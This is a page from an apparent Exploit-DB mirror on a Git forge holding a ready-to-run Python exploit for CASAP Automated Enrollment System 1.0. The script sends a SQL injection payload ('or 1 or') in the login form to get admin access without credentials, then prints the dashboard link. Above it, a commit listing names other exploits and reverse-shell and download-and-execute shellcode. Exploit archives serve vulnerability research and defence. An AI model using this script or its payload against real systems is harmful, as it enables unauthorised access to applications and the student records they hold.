bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49463.py
Offensive Security 3e80d07fdb DB: 2021-01-23 
15 changes to exploits/shellcodes

Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
Library System 1.0 - Authentication Bypass Via SQL Injection
CASAP Automated Enrollment System 1.0 - Authentication Bypass
ERPNext 12.14.0 - SQL Injection (Authenticated)
Atlassian Confluence Widget Connector Macro - SSTI

Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)
Linux/x86 - Socat Bind Shellcode (113 bytes)
Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)
Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)

Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
2021-01-23 05:01:59 +00:00

82 lines
No EOL
2.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.0
# Tested On: Ubuntu + XAMPP 7.4.4
# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi
#STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL>
# For Example: python3 exploit.py http://10.9.67.23/final/
#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser.
import time
import sys
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0 !!!')
print('!!! AUTHENTICATION BYPASS !!!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('Author - Himanshu Shukla')
def authbypass(url):
#Authentication Bypass
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
print ("[*]Attempting Authentication Bypass...")
time.sleep(1)
values = {"username":"'or 1 or'","password":""}
r=s.post(url+'login.php', data=values, cookies=cookies)
p=s.get(url+'dashboard.php', cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if ("true_admin" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
print(RED+"[-]Check Your URL", RESET)
if __name__ == "__main__":
if len(sys.argv)!=2:
print(RED+"You Haven't Provided any URL!", RESET)
print("Usage : python3 exploit.py <URL>")
print("Example : python3 exploit.py http://10.9.7.3/final/")
exit()
try:
authbypass(sys.argv[1])
except:
print(RED+"[-]Invalid URL!", RESET)
exit()
Reference in a new issue View git blame Copy permalink